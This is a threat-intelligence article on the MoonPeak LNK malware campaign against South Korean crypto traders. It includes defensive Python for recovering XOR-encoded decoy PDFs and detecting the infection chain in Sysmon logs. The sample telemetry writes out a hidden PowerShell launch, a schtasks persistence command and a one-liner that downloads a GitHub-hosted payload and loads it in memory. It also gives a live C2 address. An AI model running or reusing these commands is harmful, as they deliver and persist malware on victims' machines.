Threat actors are weaponizing LNK files to deploy the MoonPeak malware, a remote access trojan targeting Windows systems. The campaign, attributed to North Korea-affiliated groups, primarily targets South Korean investors and cryptocurrency traders by disguising malicious shortcuts as trading strategy documents. The attack chain begins with a deceptive LNK shortcut that, when opened, silently executes an obfuscated PowerShell script; the script deploys MoonPeak while displaying a decoy PDF so that the victim sees the document they expected.
The campaign, first identified in January 2026, uses LNK files with Korean filenames that suggest financial or investment-related content. Each file carries an embedded, XOR-encoded PDF that the script decodes and opens, so the victim sees a normal document while the malicious activity proceeds. Behind this facade, a hidden PowerShell script drives a multi-stage infection process, establishing persistence on the compromised system and opening communication with attacker-controlled servers. IIJ Security Diary analysts documented the full infection flow, providing detailed insight into a threat that previously lacked comprehensive public documentation.
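Because a PDF always begins with the fixed bytes "%PDF-1." and ends with "%%EOF", an XOR-encoded PDF carried inside an LNK can be recovered with a known-plaintext search even when the key is unknown. The following is an added example written for this article, not code from IIJ or from the droppers themselves: the key length, the key bytes and the LNK layout below are constructed assumptions (the sample LNK is a real shell-link header followed by filler and an XOR-encoded minimal PDF). The routine tries each offset and each repeating key length up to the length of the known header, derives the key from the header bytes, and keeps the candidate only if the rest of the header and the trailer check out.

```python
"""Recover an XOR-encoded PDF embedded in an LNK (or any blob) by known plaintext.

Added example, not IIJ's code. The key length and layout used by the MoonPeak
droppers are assumptions; the technique only relies on the fixed PDF header
"%PDF-1." and the "%%EOF" trailer.
"""
from itertools import cycle

PDF_MAGIC = b"%PDF-1."   # known plaintext at the start of every PDF
PDF_EOF = b"%%EOF"       # last keyword of a PDF file


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def find_xor_pdf(blob: bytes, max_key_len: int = 7):
    """Return (offset, key, pdf) for the first XOR-encoded PDF found, else None.

    For each offset and key length n <= len(PDF_MAGIC) the key is derived
    directly from the known header bytes, then validated against the rest of
    the header (including the version digit) and the presence of %%EOF.
    Shorter key lengths are tried first, so a single-byte key is reported as such.
    """
    max_key_len = min(max_key_len, len(PDF_MAGIC))
    for off in range(len(blob) - len(PDF_MAGIC)):
        for n in range(1, max_key_len + 1):
            key = xor_bytes(blob[off:off + n], PDF_MAGIC[:n])
            # Cheap header check before decoding the whole remainder.
            head = xor_bytes(blob[off:off + 8], key)
            if not head.startswith(PDF_MAGIC) or not head[7:8].isdigit():
                continue
            decoded = xor_bytes(blob[off:], key)
            end = decoded.rfind(PDF_EOF)
            if end == -1:
                continue
            return off, key, decoded[:end + len(PDF_EOF)]
    return None


# Constructed sample: LNK HeaderSize (0x4C) + LinkCLSID {00021401-0000-0000-C000-000000000046},
# 60 bytes of filler, then a minimal PDF XOR-encoded with a constructed 3-byte key.
LNK_HEADER = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
SAMPLE_KEY = b"\x5a\xa7\x13"
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
              b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


def build_sample_lnk() -> bytes:
    """Stand-in for a dropper LNK with an embedded XOR-encoded decoy PDF."""
    return LNK_HEADER + b"\x00" * 60 + xor_bytes(SAMPLE_PDF, SAMPLE_KEY)


if __name__ == "__main__":
    hit = find_xor_pdf(build_sample_lnk())
    if hit is None:
        print("no XOR-encoded PDF found")
    else:
        off, key, pdf = hit
        print(f"PDF at offset {off}, key {key.hex()}, {len(pdf)} bytes")
```

On a real sample, pass the raw LNK bytes to `find_xor_pdf` and write the returned PDF to disk for inspection; if the dropper uses a key longer than the seven known header bytes, extend the known plaintext (for example with the "%%EOF" trailer at a guessed position) rather than raising `max_key_len` past what the header can anchor.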
Researchers discovered that the threat actors host malicious payloads in GitHub repositories, a technique known as Living Off Trusted Sites (LOTS). Traffic to a widely used platform blends in with legitimate activity and is rarely blocked by domain-reputation controls, so the malicious infrastructure sits inside a trusted site. Blocking GitHub outright is seldom practical for an organization, which means detection has to focus on which process fetches from it and what it does with the bytes rather than on the domain itself.
Multi-Stage Infection Mechanism and Evasion Tactics of MoonPeak Malware
The MoonPeak infection process is a three-stage execution mechanism designed to avoid security analysis and maintain persistent access. The initial stage is an environment check: the PowerShell script launched by the LNK looks for security tools and virtual environments by searching the list of running processes for names such as IDA Pro, Wireshark, OllyDbg, and various sandbox indicators. If any analysis tool is found, the script terminates immediately, so that the payload only runs on genuine victim machines. A check of this kind keys on process names alone, so an analyst can sidestep it by renaming the tools or by detonating the sample in an environment that does not expose them.
Following a successful environment check, the PowerShell script creates randomly named folders and files in the temporary directory and downloads additional scripts from remote servers into them. To survive a reboot, it creates a scheduled task that launches the malware automatically. Scheduled-task creation is one of the more visible steps in the chain: with object-access auditing enabled, Windows records it as Security event 4698, and the task definition itself persists as a file under C:\Windows\System32\Tasks.
The second stage retrieves a GZIP-compressed payload from a GitHub repository. The payload is decompressed and loaded directly into memory without ever being written to disk, which defeats antivirus solutions that rely on scanning files. It does not hide the PowerShell that performs the download, decompression and load, which Script Block Logging (Event ID 4104) still records, and that is where detection of this stage belongs.
The final stage is the deployment of MoonPeak itself. The binary is obfuscated with ConfuserEx, an open-source .NET obfuscator that hinders decompilation and reverse engineering, making it harder for analysts to understand its inner workings. Once active, MoonPeak connects to its command-and-control server at 27.102.137[.]88 on port 443. This connection lets the attackers remotely control the infected machine, potentially granting full access to sensitive data and system functionality.
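The three stages above each leave a distinct trace in process-creation and network telemetry, and the chain becomes convincing only when several of them line up on one host. The following added example, not code from IIJ's report, expresses that as detection logic run over constructed Sysmon-style events (Event ID 1 for process creation, Event ID 3 for network connections). Field names follow Sysmon; the host names, task name, temp paths, repository path and exact command lines in the sample are invented stand-ins, and only the C2 address 27.102.137.88:443 comes from the article.

```python
"""Detect the MoonPeak LNK -> PowerShell -> scheduled task -> GitHub -> C2 chain.

Added example, not from IIJ's report. Events are constructed Sysmon-style
dicts; only the C2 address below is taken from the published analysis.
"""
import re
from collections import defaultdict

C2 = ("27.102.137.88", 443)  # from the article; everything else is constructed

# Each rule: (name, stage, predicate over one event dict). `and` short-circuits
# on EventID, so process fields are only read on process-creation events.
RULES = [
    ("lnk_spawned_powershell", "stage1",
     lambda e: e.get("EventID") == 1
        and e["Image"].lower().endswith("powershell.exe")
        and e["ParentImage"].lower().endswith("explorer.exe")
        and re.search(r"-(w(indowstyle)?\s+hidden|enc(odedcommand)?|nop(rofile)?)\b",
                      e["CommandLine"], re.I) is not None),
    ("schtasks_from_powershell", "stage1",
     lambda e: e.get("EventID") == 1
        and e["Image"].lower().endswith("schtasks.exe")
        and e["ParentImage"].lower().endswith("powershell.exe")
        and re.search(r"/create\b", e["CommandLine"], re.I) is not None),
    ("github_gzip_inmemory_load", "stage2",
     lambda e: e.get("EventID") == 1
        and e["Image"].lower().endswith("powershell.exe")
        and re.search(r"raw\.githubusercontent\.com|github\.com", e["CommandLine"], re.I) is not None
        and re.search(r"GZipStream|Assembly\]::Load|Invoke-Expression|\biex\b",
                      e["CommandLine"], re.I) is not None),
    ("moonpeak_c2_connect", "stage3",
     lambda e: e.get("EventID") == 3
        and (e.get("DestinationIp"), int(e.get("DestinationPort", 0))) == C2),
]


def evaluate(events):
    """Return (rule_name, stage, host) for every rule that fires on any event."""
    hits = []
    for e in events:
        for name, stage, pred in RULES:
            if pred(e):
                hits.append((name, stage, e["Computer"]))
    return hits


def correlate(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages fired.

    A hidden PowerShell launch from Explorer on its own is noisy; the same host
    also registering a task, fetching from GitHub into memory, or reaching the
    C2 is what turns it into an incident.
    """
    stages = defaultdict(set)
    for _name, stage, host in evaluate(events):
        stages[host].add(stage)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed Sysmon-style telemetry, not real logs
    {"EventID": 1, "Computer": "WS-TRADER01", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -w hidden -nop -ep bypass -f C:\Users\u\AppData\Local\Temp\kj3d9\a1.ps1"},
    {"EventID": 1, "Computer": "WS-TRADER01", "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": PS,
     "CommandLine": r"schtasks.exe /create /sc onlogon /tn WinUpdateSvc /tr powershell.exe -w hidden -f C:\Users\u\AppData\Local\Temp\kj3d9\a1.ps1 /f"},
    {"EventID": 1, "Computer": "WS-TRADER01", "Image": PS, "ParentImage": PS,
     "CommandLine": r"powershell.exe -nop -w hidden -c $b=(Invoke-WebRequest https://raw.githubusercontent.com/example-org/example-repo/main/p.gz -UseBasicParsing).Content;$ms=New-Object IO.MemoryStream(,$b);$gz=New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress);$out=New-Object IO.MemoryStream;$gz.CopyTo($out);[Reflection.Assembly]::Load($out.ToArray()).EntryPoint.Invoke($null,$null)"},
    {"EventID": 3, "Computer": "WS-TRADER01", "Image": PS,
     "DestinationIp": "27.102.137.88", "DestinationPort": "443"},
    # Benign noise on another host: an interactive shell and ordinary HTTPS traffic.
    {"EventID": 1, "Computer": "WS-DEV02", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"EventID": 3, "Computer": "WS-DEV02", "Image": PS,
     "DestinationIp": "140.82.112.3", "DestinationPort": "443"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print(correlate(SAMPLE_EVENTS))
```

The rules are deliberately narrow in their parent/child requirements and broad in their command-line patterns; in production, feed them from a SIEM query on Sysmon or Windows event 4688 with command-line auditing enabled, and keep the C2 tuple in a separately maintained IOC list rather than in code.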
The continuous evolution of malware delivery techniques, such as the use of LNK files and LOTS, highlights the persistent and adaptive nature of cyber threats targeting Windows users. Organizations and individuals, particularly those in the financial sector or dealing with cryptocurrency, are urged to maintain heightened vigilance against such sophisticated attacks. Staying informed about emerging threats and implementing robust cybersecurity practices, including regular software updates and employee security awareness training, remains paramount in mitigating these risks.